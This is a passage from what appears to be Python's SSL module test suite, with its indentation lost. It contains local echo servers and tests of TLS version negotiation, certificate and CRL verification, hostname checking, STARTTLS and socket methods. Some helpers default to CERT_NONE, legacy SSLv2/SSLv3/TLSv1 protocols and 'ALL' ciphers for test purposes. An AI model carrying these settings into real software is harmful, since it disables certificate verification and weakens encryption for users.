sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# server_context.load_verify_locations(SIGNING_CA)
server_context.load_cert_chain(SIGNED_CERTFILE2)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
